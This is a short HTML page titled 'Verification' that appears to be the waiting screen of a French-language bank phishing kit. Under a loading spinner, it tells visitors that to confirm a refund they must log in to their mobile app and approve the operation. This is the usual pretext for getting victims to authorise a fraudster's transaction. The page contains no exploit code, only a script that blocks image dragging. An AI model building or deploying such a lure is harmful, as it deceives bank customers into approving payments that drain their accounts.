<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verification</title>

<style>

html, body {
padding: 0;
margin: 0;
width: 100%;
height: 100%;
display: flex;
justify-content: center;
align-items: center;
background-color: #fff;
box-sizing: border-box;
user-select: none;
}

#card {
background-color: #fafafa;
box-shadow: 0px 0 20px rgba(0,0,0,0.2);
box-sizing: border-box;
border-radius: 10px;
max-width: 300px;
height: fit-content;
margin: 0 20px;
padding: 20px;
display: flex;
flex-direction: column;
justify-content: center;
align-items: center;

}

#title {
margin: 0;
padding: 0;
font-size: 25px;
font-weight: bold;
color: #000;
}

#loading {
width: 80px;
height: 80px;
margin: 0;
padding: 20px 0;

}

#text {
margin: 0;
padding: 0;
font-size: 14px;
text-align: center;
color: #111;
}

</style>

</head>
<body>
    <div id="card">
<p id="title">Merci de patience </p>
<img src="https://files.catbox.moe/1uy12k.gif" alt="loading" id="loading">
<p id="text">Pour confirmer le remboursement <br> Connectez-vous sur votre application mobile <br> confirmer votre opération en toute sécurité.</p>
    </div>

<script>
        document.querySelectorAll('img').forEach(img => {
            img.addEventListener('dragstart', function(event) {
                event.preventDefault();
            });
        });
        
</script>
</body>
</html>